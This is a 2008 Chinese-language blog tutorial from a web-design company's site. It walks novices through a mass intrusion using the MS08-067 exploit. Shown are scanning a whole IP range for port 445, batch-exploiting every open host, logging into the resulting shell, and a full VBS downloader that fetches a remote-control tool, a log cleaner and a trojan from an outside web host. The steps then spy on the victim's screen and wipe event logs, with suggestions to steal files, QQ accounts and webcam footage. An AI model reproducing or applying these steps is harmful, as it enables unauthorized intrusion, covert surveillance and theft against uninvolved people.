青海网站建设、网络推广最好的公司--您身边的网站建设专家,马上拿起电话,联系我们:0971-8235355   
青海西宁网站建设、网站制作公司-西宁威势电子信息服务有限公司 首页 |  公司简介 |  网站建设 |  网络推广 |  空间租用 |  域名注册 |  企业邮局 |  网络安全 |  网站编程 |  客服中心 |  联系我们 |  人才招聘
 
西宁威势最新网站制做案例展示
Lastest Project
 
西宁网站建设  
当前位置为:首页 >> 安全防护 >> 正文  
《入侵三步曲之扫描-溢出-上传木马》

文章来源: 西宁威势电子信息服务有限公司     发布时间:2008-11-9    浏览次数:14470    tags:扫描 溢出 入侵 上传木马 MS0806

《入侵三步曲之扫描-溢出-上传木马》之上篇

孤行一鬼手把手教你一步步入侵--------------------MS08-067漏洞利用

 

      其实写一篇入侵的文章并不困难,但是写一篇让大众化和菜鸟们都能理解和撑握的文章真是有点难度(这里我暂且把上网时间有一年的称之为大众化),所以在开始文章之前,我先简单的介绍一下我的文章的结构,以方便小菜菜们理清自己的思路。文章结构如下

一、前言

二、文章版权说明

三、准备篇

四、扫描篇

五、攻击篇

六、木马上传篇

七、远程控制篇

OK,言归正传,Let’s Go !

前言

        我写本文的目的是为了让大家提高网络安全意识,了解黑客的攻击原理,并让大家知道防范措施,并不是真正的教你去入侵别人的电脑及服务器,本文在发表之时,全球仍有N多服务器有此漏洞,文中提到的方法对别人的服务器及个人电脑有很大的攻击性,请您读完本文后请勿尝试模仿攻击别人,这样可能会引起法律后果,如果您不同意我的观点,请您不要接着往下看了,否则如果您由于攻击别人引起的任何法律后果与文章作者无关!

    我的废话说完了,如果同意上面的观点,接着往下看

文章版权说明

    此文章由西宁威势电子信息服务有限公司 孤行一鬼 首发于 西宁威势电子信息服务有限公司网站“网络安全”频道 网址:http://www.qhwins.com

作者充许您可以随时随意转载,但是转载时请注明出处及保持文章的完整性,作者会很感激您的^_^ ,Ok又鸡婆了,接下来我们我们再看

准备篇

    我们在开始之前,首先要知道我们具体要做些什么,如何去做,需要什么样的环境及软件等,OK 我一项一项来说明

攻击环境:

1、WINDOWS XP / WINDOWS 2003 / WINDOWS 2000 操作系统中的任意一版本

2、CMD.EXE (为了通俗,有些人叫他为DOS窗口)

  注,有些XP版的操作系统是精减版的,此项可能被禁用了,这样的是不行的,如果你还不知道什么是CMD.EXE的话,没关系,往下看,下面会提到。

3、WEB空间 一个(个?)

用来存放我们的木马,不需要太大,以便在肉机上下载

所需工具:

    孤行一鬼已经帮你们全打好包了,从下面的地址下载就可以得到,下载前请注意,下载的文件中有些文件或者是全部文件可能会被杀毒软件报为病毒处理,所以下载前,到入侵整个过程中,我们都要关闭杀毒软件。我们下载的工具,它对别人的电脑具有一定的攻击性,但不关你运行与否,它都不会对您的电脑有任何的危害,所以我们竟可放心运行,但是如果您对杀毒软件的警告很在意的话,那么我告诉你,下面的文章你也没有必要看下去了,就此收手!

下载地址:

http://www.qhwins.com/tools/tools.rar

下载的是一个压缩包,需要用WINRAR软件解压,解压开的文件中包括以下几个名字:

s.exe    扫描器,用来扫描我们的入侵目标

MS.exe (MS08067.EXE) 漏洞溢出工具,用来攻击目标

Radmin.exe    一款商业远程控制软件,我们用它来登录肉机,当然你也可以换成你自己的

孤行一鬼.EXE 孤行一鬼专用的登录器,用来登录肉机用的控制端

Down.vbs  用来向肉机中下载R.EXE文件的脚本程序

LogKiller.exe 入侵完成后用来删除日志,以防别人找见我们的小工具,用来擦PP

 

      OK,工具差不多这些就足够了,我们再补补有些菜鸟们的DOS知识,我们好多人都在学别人入侵,但是照着别人的样子,一字不差的输入同样的命令,别人能运行成功,自己却运行不了,为什么呢,举个例子来说,我们下面要用S扫描器扫描肉机,我的步骤如下:

  点开始,再点运行,在里面输入CMD然后回车:

注意,你的操作系统和我的有可能不一样,看到的界面有些出入,均不妨碍我们的操作

回车后得到下面的一个界面

OK,为了方便我们菜鸟理解,我们暂且把这个窗口叫做“DOS窗口”吧,其实这样叫是不对的,这个窗口也就是我前面所说的CMD.EXE ,如果你发现你连这个窗口都打不开的话,那么说明你的操作系统禁用了CMD.EXE,请您先解决这个问题,再来往下看

下面我们了解一下常用的DOS命令

1、cd

这个命令是用来改变目录的,什么叫做目录呢?就是我们上面这个“DOS窗口”中看到的

以下是引用片段:

C:\docements and settings\Administrator

这个就代表我们计算机上的一个目录,了解这一点,对我们有些不懂的人很重要,我们首先从上面的网址下载程序,下载后解压到D:\TOOLS\目录下(当然也可以是其它目录,我的电脑上是这样的目录D:\hacker\tools\),如果我们电脑上的D盘没有这个TOOLS目录,我们可以自己建一个,然后再把文件解压进去,然后我们在上面的DOS窗口中输入以下的命令,将当前路径转到我们工具文件所在的路径中:

以下是引用片段:

Cd d:\tools\ 回车

注意,“回车”是我的提示,不是命令的^_^,如果你连这两个字都输入进去,那你可以去当黑客了. Cd是命令,CD后面跟一个空格,然后是路径,在我的电脑上因为工具全放在D:\HACER\TOOLS\下面,所以是这样的命令,这个根据你的工具路径而定

这是我们注意到了,当前路径已经切换到了我们工具所在的路径了

这样我们的扫描器才可以使用,否则,你要依照我的方法照做的时候,有可能会看到下面的出错提示:

OK,我相信,好多菜鸟就是卡在这一步上的,知道了如何解决,我们就可以继续了

2、其它的DOS命令,遇到了我再加以说明,这里不再鸡婆了

 

扫描篇

 

OK,我们下面来确定攻击范围。自从冲击波病毒爆发,好多互联网接入商将一些危险的端口给屏蔽掉了,我们今天要用到的445端口就被直接屏蔽了,他们通常只能在同一个网段下才可以互相访问,不同网段或不同网关下,即使对方开了445端口,我们也访问不了,这一点影响了我们抓鸡的范围,所以,我们今天只找同一网段的肉机吧

OK,我们来查看一下自己的IP地址,打开个这网址

http://www.ip138.com

以下是引用片段:
您的IP地址是:[220.167.123.45]

上面是我看到我的IP,你看到的肯定和我的不一样,OK,我们再在可以这样定位扫描的IP范围

开始IP:220.167.100.1 结束IP:220.167.254.254

注意,最大是255

OK,我们自己的IP地址是位于这两个IP之间的,这个范围你根据自己的需要自己设定,最小是0,最大是255

现在我们回到DOS窗口中,注意,要切换到工具所在的路径中,用S扫描器进行扫描

因为我们溢出的是RPC服务,所以要扫描445端口 ,我们在窗口中输入以下命令

注意,抓图很累人的,以下文章中,我在不抓图的时候尽量不抓了,大家明白怎么输入命令就可以了

上图中,S是我们要用的工具 TCP是扫描方式 下来是开始IP,结束IP 端口号 线程数 /SAVE代表把扫描结果保存起来

然后加车,我们的扫描器就开始扫描这个IP段所有开放了445端口的服务器

扫描过程中出现提示和以下文字类似

以下是引用片段:

220.167.247.136  445   Open

220.167.247.168  445   Open

220.167.247.177  445   Open

220.167.247.187  445   Open

220.167.247.207  445   Open

220.167.247.196  445   Open

220.167.247.216  445   Open

220.167.247.248  445   Open

220.167.248.123  445   Open

220.167.248.146  445   Open

220.167.248.179  445   Open

220.167.249.118  445   Open

220.167.249.127  445   Open

220.167.249.156  445   Open

220.167.249.123  445   Open

220.167.249.189  445   Open

220.167.249.193  445   Open

220.167.249.191  445   Open

220.167.249.224  445   Open

220.167.250.52   445   Open

220.167.250.127  445   Open

220.167.250.137  445   Open

Scan 39426 IPs Complete In 0 Hours 47 Minutes 28 Seconds. Found 578 Hosts

OPEN就是开放端口的意思,扫描完成后给出提示,扫描了39426个IP,花去了47分钟时间,发现了578个开放445端口的主机,扫描完成后,在S.EXE文件所在位置找到Result.txt文件,这里面保存了扫描结果。OK,我们把这个文件中其它信息全删除掉,只留个IP列表就可以了,这个怎么操作,你自己发挥吧,可以批删除,替换,我就不说了

在每个IP前面加上ms 注意,后面有一个空格,然后把文件保存成一个BAT文件,保存到和工具同一个目录的地方,不要保存到桌面之类,到时候自己找不到。

给大家抓个图说明一下

怎么把Result.txt文件保存成BAT文件?OK,小菜们跟我来,大鸟们飞过这段

双击Result.txt,用记事本打开Result.txt文件,我们将格式按要求转换好以后选择文件菜弹,另存为

注意保存路径 ,文件名后面有个.BAT,点是半角实心的,不是中文输入法下的,保存类型选把所有文件。

我们把处理好的文件保存成一个445.BAT的批处理文件了,注意,445.bat一定要和溢出工具MS.EXE放在同一目录下。

小提示:

有些人的电脑上看不到文件的后辍名,只能看到445,这是因为你没有打开后辍名查看功能,用以下方法可以打开

双击 我的电脑 然后选菜单中的 工具 命令 ,接下来 选项>>查看>>在查看页中找到高级设置中的“隐藏已知文件中的扩展名” 将前面的对色取消掉,一路确定下来就可以看到文件的扩展名了。OK,说了一堆没用的话,我们继续

这个445.BAT是我们处理好的批处理文件,我们在DOS下面就可以直接运行了

 

 

攻击篇

 

做完以上的工作,我们可以开始攻击了,攻击目标就是扫描中开放了445端口的服务器,我们直接在DOS窗口中运行445.BAT程序就可以了

扫描窗口中,输入445.bat回车,程序就自己开始溢出攻击了

注意,我们扫描前和攻击前,除了要关闭杀毒软件,还要关闭防火墙,以免防火墙拦截攻击程序发包,造成溢出失败,前面忘说了,这里面补上,操作系统自带的ICS防火墙弹出提示,让我们选择时,我们选择“解决阻止”就可以了。

溢出过程中,窗口不断有类似下面的信息在滚动,抓图如下:

OK,这是一个漫长的过程,我们可以让电脑自动去攻击,我们去喝上一杯茶水再来

《入侵三步曲之扫描-溢出-上传木马》之下篇

    SOORY,给大家说一下,由于下班了,所以文章没有写完,就直接回家了,下面是在家里玩的时候,给大家写的,目录名和前面的不一样,但是道理是一样的,大家原谅。

上篇中我们力求用最简单通俗的语言给大家讲解了一些基础知识,包括扫描过程,溢出过程,下面我们继续。

    当我们看到溢出的时候有这样的提示的时候,说明溢出成功了!

以下是引用片段:

E:\hacker\ms08067>ms 123.45.67.89

MS08-067 Exploit for CN by EMM@ph4nt0m.org

SMB Connect OK!

Send Payload Over!

E:\hacker\ms08067>

    溢出成功后,肉机会开放4444端口,我们在命令行(DOS窗口中)中输入这样的命令来登录肉机,

以下是引用片段: 注意空格
E:\hacker\ms08067>telnet 123.45.67.89  4444

 

    回车后要是我们看到这样的提示,说明这台肉机已经是归于我们所有了

以下是引用片段:

Microsoft Windows XP [版本 5.1.2600]

(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

      我已经telnet登录上去了,注意,我们也可以用NC登录,NC在回显方面比TELNET好一点,OK,我们来看看这台肉机有没有什么我感兴趣的东东

以下命令直接在得到的CMDSHELL中输入(CMDSHELL就是人机交互的这个界面,你可以简单的理解成TELNET登录成功的这个DOS窗口)有些命令是我输入的,有些是系统回显的,我在后面加以简单的批注,大家一起来看看我是怎么样一步步将这个肉机控制的

D:\     [括号中是我加的批注,不要输入,从C盘切换到D盘]

D:\>dir  [我们来看看有没有好玩的东东]

Dir     [注意,以下是系统回显的信息,不用我们输入]

以下是引用片段:
驱动器 D 中的卷没有标签。

 卷的序列号是 3754-1BDB

 D:\ 的目录

2008-04-23  19:12    <DIR>          QQ

2008-04-23  19:12    <DIR>          QQMusic

… …. … …… ……                   [注意,为了用户隐私,我略去部分内容]

2008-04-23  19:19    <DIR>          Program Files

200804-23  18:21    <DIR>          ABCDEFG

               1 个文件      3,924,415 字节

              32个目录 56,504,224,256 可用字节

 [系统回显完毕]

OK,用同样的命令查看其它盘符下的文件,我们再看看肉机上都有什么服务在运行(你要不知道什么是服务的话,可以简单的理解为程序,其实两者是有区别的)

以下是引用片段:

D:\>c:  [切换到C盘,C盘SYSTEM32目录下文件多,好办事,嘿嘿]

c:      [系统回显,不用输入]

C:\WINDOWS\system32>net start  [系统切换到C:\WINDOWS\SYSTEM32目录下了,net start 是我输入的命令,查看肉机启动的服务]

net start                        [系统回显]

以下是引用片段:

已经启动以下 Windows 服务:    [以下都是回显,不用输入]

 

   Application Layer Gateway Service

   Automatic Updates

   COM+ Event System

   Computer Browser

   Contrl Center of Storm Media

   Cryptographic Services

   DCOM Server Process Launcher

   DHCP Client

   Distributed Link Tracking Client

   DNS Client

   Error Reporting Service

   Event Log

   Fast User Switching Compatibility

   Help and Support

   IPSEC Services

   Logical Disk Manager

   Network Connections

   Network Location Awareness (NLA)

   Plug and Play

   Print Spooler

   Protected Storage

   Remote Access Connection Manager

   Remote Procedure Call (RPC)

   Remote Registry

   Rising Process Communication Center

   Secondary Logon

   Security Accounts Manager

   Security Center

   Server

   Shell Hardware Detection

   SSDP Discovery Service

   System Event Notification

   Task Scheduler

   TCP/IP NetBIOS Helper

   Telephony

   Terminal Services

   Themes

   WebClient

   Windows Audio

   Windows Firewall/Internet Connection Sharing (ICS)

   Windows Image Acquisition (WIA)

   Windows Management Instrumentation

   Windows Time

   Wireless Zero Configuration

   Workstation

命令成功完成。

[回显完毕]

    我们看到肉机上运行了瑞星杀毒服务,OK,我们传一个脚本上去,用脚本下载我们的木马程序在肉机上运行(什么叫肉机?郁闷!自己查去!)

    在网上搜索了一个VBS下载脚本,传上去了,结果被瑞星给杀了,郁闷,下载失败,所以自己写了一个DOWN.VBS脚本,脚本内容在以后再在我网站公开,以防大家模仿攻击别人,大家如有兴趣,可以留意我的网站:http://www.qhwins.com(卖个关子,做个小广告,嘿嘿)过段时间我挂上去,嘿嘿,完全免杀的。先把网上找的脚本给大家看吧,说明一下怎么用。打开记事本(你说什么?不知道记事本怎么打开?你怎么不去撞墙啊!在DOS窗口中输入notepad回车就可以打开了)将以下的代码粘贴进去,注意,前几行是我加的说明,不要粘进去.

‘文件名:down.vbs( 这段不要输入记事本里面)

‘文件说明,用来下载网上的文件到肉机电脑中,代码来自于互联搜索( 这段不要输入记事本里面)

‘法律申明:以下脚本仅用于测试,请勿用于非法入侵,代码作者不承担任何法律责任( 这段不要输入记事本里面)

    代码正式开始:(下面的开始,输入到记事本里面)

以下是引用片段:

echo sub module() >>down.vbs

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>down.vbs

echo xPost.Open "GET","http://www.qhwins.com/hacker/"^&strha ,0 >>down.vbs  //木马文件存放的空间,比如你的木马存在ABC.COM上面,就把上面的地址换成你的WWW.ABC.COM ,此行是我加的批注,不要输入到记事本中,以下看到的//后面的内容都是我加的说明,不要输入

echo xPost.Send() >>down.vbs

echo Set sGet = CreateObject("ADODB.Stream") >>down.vbs

echo sGet.Mode = 3 >>down.vbs

echo sGet.Type = 1 >>down.vbs

echo sGet.Open() >>down.vbs

echo sGet.Write(xPost.responseBody) >>down.vbs

echo sGet.SaveToFile "c:\"^&strha,2 >>down.vbs

echo set xPost=Nothing >>down.vbs

echo set sGet=Nothing >>down.vbs

echo end sub >>down.vbs

echo for i=1 to 3 >>down.vbs //要下载3个文件的意思,“//”后面的是我的说明不要输入

echo select case i >>down.vbs

echo case 1 >>down.vbs   

echo strha="radmin.exe" >>down.vbs  //要下载的第一个文件,你可以换成你的

echo call module() >>down.vbs

echo case 2 >>down.vbs

echo strha="logkiller" >>down.vbs

echo call module() >>down.vbs

echo case 3 >>down.vbs

echo strha="XXX(XXX换成你的文件名)" >>down.vbs

echo call module() >>down.vbs

echo end select >>down.vbs

echo next >>down.vbs

    我们把上面的代码复制,然后回到CMDSHELL中点右键粘贴,我们这么做的目的是用DOS的ECHO命令将代码写到肉机的DOWN.VBS文件中,OK,写入完成后,我们DIR一下,看有没有写入成功,DIR DOWN.VBS就可以了,要是文件写入成功了,我们直接运行

    小提示:以上代码是从网上搜索来的,写的比我还鸡婆,还会被杀毒软件杀掉,我自己测试的时候用的是我自己写的DOWN.VBS脚本,大家可以在本站中找到。

以下是引用片段:

C:\WINDOWS\system32>down.vbs  [我们把脚本ECHO到肉机电脑中后直接输入运行]

down.vbs

[脚本已经运行了]

[稍等片刻,时间由肉机的网速而定,我们看一下文件下载下来了没]

以下是引用片段:

C:\WINDOWS\system32>dir radmin.exe  

 dir radmin.exe   [这里开始是系统回显]

 驱动器 C 中的卷没有标签。

 卷的序列号是 ABCE-CDE12

 C:\WINDOWS\system32 的目录

2008-04-23 11:48           274,753 radmin.exe

               1 个文件        274,753 字节

               0 个目录  20,258,657,956 可用字节

[嘿嘿,文件已经好好的躺在那里,我们删除下载脚本,以防被人发现]

以下是引用片段:

C:\WINDOWS\system32>del down.vbs   [我输入的删除命令]

del down.vbs

C:\WINDOWS\system32>radmin.exe  [删除成功后我们来运行远程控制的服务端]

radmin.exe

 

  [运行后我们查看一下是否成功了,成功后会打开特定端口,我们要是换成木马的话,嘿嘿,是看不到端口的,在这里我们不做过格的事情,用RADMIN来代替,服务运行成功后会开1038端口]

下面是系统回显:

以下是引用片段:

Active Connections

  Proto  Local Address          Foreign Address        State

  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING

  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING

  TCP    0.0.0.0:6059           0.0.0.0:0              LISTENING

  TCP    192.168.49.40:139      0.0.0.0:0              LISTENING

  TCP    123.45.67.89:445     221.***.***.9:23343    ESTABLISHED

  TCP    123.45.67.89:1050    219.***.***.243:8000    CLOSE_WAIT

  TCP    123.45.67.89:1053    219.***.***.142:443     CLOSE_WAIT

  TCP    123.45.67.89:1060    219.***.***.142:443     CLOSE_WAIT

  TCP    123.45.67.89:1135    124.***.***.:443      ESTABLISHED

  TCP    123.45.67.89:1152    219.***.***.42:443     CLOSE_WAIT

  TCP    123.45.67.89:1303    124.***.***.:443      ESTABLISHED

  TCP    123.45.67.89:1657    219.***.***.243:8000    ESTABLISHED

  TCP    123.45.67.89:2137    61.***.***..9:80         TIME_WAIT

  TCP    123.45.67.89:2138    61.***.***..7:8000       TIME_WAIT

  TCP    123.45.67.89:2139    61.***.***..9:8000       TIME_WAIT

  TCP    123.45.67.89:2140    61.***.***..7:80         TIME_WAIT

  TCP    123.45.67.89:2141    61.***.***..9:8000       TIME_WAIT

  TCP    123.45.67.89:2142    61.***.***..7:80         TIME_WAIT

  TCP    123.45.67.89:2143    61.***.***..7:8000       TIME_WAIT

  TCP    123.45.67.89:2144    61.***.***..9:80         TIME_WAIT

  TCP    123.45.67.89:2145    123.***.***..66:443     TIME_WAIT

  TCP    123.45.67.89:2146    123.***.***..99:443     ESTABLISHED

  TCP    123.45.67.89:4444    221.***.***..59:23415    ESTABLISHED

  UDP    0.0.0.0:445            *:*

  UDP    0.0.0.0:500            *:*

  UDP    0.0.0.0:1025           *:*

  UDP    0.0.0.0:4000           *:*

  UDP    0.0.0.0:4001           *:*

  UDP    0.0.0.0:4002           *:*

  UDP    0.0.0.0:4003           *:*

  UDP    0.0.0.0:4004           *:*

  UDP    0.0.0.0:4500           *:*

  UDP    0.0.0.0:5354           *:*

  UDP    0.0.0.0:5357           *:*

  UDP    0.0.0.0:6000           *:*

  UDP    127.0.0.1:123          *:*

  UDP    127.0.0.1:1048         *:*

  UDP    127.0.0.1:1055         *:*

  UDP    127.0.0.1:1140         *:*

  UDP    127.0.0.1:1161         *:*

  UDP    127.0.0.1:1304         *:*

  UDP    127.0.0.1:1328         *:*

  UDP    127.0.0.1:1900         *:*

  UDP    192.168.49.40:123      *:*

  UDP    192.168.49.40:137      *:*

  UDP    192.168.49.40:138      *:*

  UDP    192.168.49.40:1900     *:*

  UDP    123.45.67.89:123     *:*

  UDP    123.45.67.89:1900    *:*

 

C:\WINDOWS\system32>

还没有开,说明还没有运行成功

稍等片刻,再运行一下上面的命令

以下是引用片段:

C:\WINDOWS\system32>netstat -an

netstat -an

 

Active Connections

 

  Proto  Local Address          Foreign Address        State

  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING

  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING

  TCP    0.0.0.0:6059           0.0.0.0:0              LISTENING

  TCP    0.0.0.0:1038           0.0.0.0:0         ESTABLISHED

  UDP    0.0.0.0:445            *:*

  UDP    0.0.0.0:500            *:*

  UDP    0.0.0.0:1025           *:*

  UDP    192.168.49.40:1900     *:*

  UDP    123.45.67.89:123     *:*

  UDP    123.45.67.89:1900    *:*

 

C:\WINDOWS\system32>

 

    我们省取一些没有用的回显信息,我们看到了,端口已经成功开放,OK,我们在本机用客户端登录

    我们打开客户端,我对上面的图标菜单依次加一简单的说明

    也就是上面的15个图标,其中第三个和第四个是灰色的,我们点第二个有加号的,增加一个服务端,

    出显上面的界面后我们依上面我信息照样输入,IP换成我们溢出得到的IP就可以了,端口换成我们配置的服务端的端口1038,点OK

    我们看到多了一个服务端,先点第六个图标(千万不要点错),也就是只查看不控制,第五个是控制的,不要乱点,会让人家发现的!!!

    点了第六个图标后,我们再双击“肉机来了哈哈”服务端,弹出对话框,输入密码,OK,我们就登录到肉机上去了,这时我们可以偷看别人的屏幕,而肉机主人一点也没有察觉,嘿嘿,看看肉机主人在做什么?

 

    嘿嘿,为了保护别人隐私,放个小图吧

    我们接下来可以做很多事情,比如说,偷取文件,盗取QQ号,(这MM看上去QQ真多)装个木马,远程控制肉机,打开肉机的声音,或视频偷拍之类(靠,不要扔砖头!不说了,教坏小孩子可不好)

OK,我们删除日志

以下是引用片段:

C:\WINDOWS\system32>logkiller

logkiller

Log Killer V1.0 By WinEggDrop

Cleaning Event Logs......

Clean Application Event Log Successfully

Clean Security Event Log Successfully

Clean System Event Log Successfully

-----------------------------------------------------------------------------

Backing Up Services Status...... Done

-----------------------------------------------------------------------------

Stopping Services......

…….

省取一堆日志删除的回显,这时的画面颇有点黑客帝国的画面,屏闪很快,看着过瘾,这样警察叔叔就找不着我们了,呵呵

C:\WINDOWS\system32>Del logkiller.exe

Del logkiller.exe

    擦完PP后我们再过河拆桥,把这个LOGKILLER.EXE也干掉,完事之后我们可以高兴的输入命令退出,然后用远程控制软件蹂躏这个肉机了

以下是引用片段:

C:\WINDOWS\system32>exit

失去了跟主机的连接。

C:\Documents and Settings\Administrator>

 

退出,闪人

后记:由于我一边入侵做演示,一边还要抓图写文章,花了我差不多四十多分钟的时间,其实,真正的入侵过程我只花了两三分钟,包括从溢出成功到木马上传,再到删除日志走人,远程控制登录,中间没有碰到任何难题。这些都是我积累下来的经验,但是我们有时候入侵的时候往往没有这么顺利,在入侵过程中经常会遇到和杀毒软件相遇,我们还要免杀自己的木马,或是想尽千方百计干掉杀毒软件,突破防火墙之类,这里我们暂且不提这些了,这些不是今天的重点。


上一篇:电脑重要数据备份与恢复速查手册
下一篇:[原创]IIS日志时间和本地时间不符,怎么样取得准确时间?
评论列表
正在加载评论……
  
评论   
呢  称:
验证码: 若看不清请点击更换!
内  容:
 
 
  在线洽谈咨询:
点击这里,在线洽谈   点击这里,在线洽谈   点击这里,在线洽谈
与我交谈  与我交谈 与我交谈
乘车路线    汇款方式   加盟合作  人才招聘  
公司地址:青海省西宁市西关大街73号(三二四部队招行所四楼)     青ICP备13000578号-1 公安机关备案号:63010402000123    
QQ:147399120    mail:lostlove000@163.com    电话: 13897410341    邮编:810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    版权所有:西宁威势电子信息服务有限公司 未经书面制授权,请勿随意转载!
业务:青海网站制做青海网站建设青海网页设计西宁网站制做西宁网站建设青海域名注册青海网络推广青海网站推广青海空间租用青海软件开发网站安全网络安全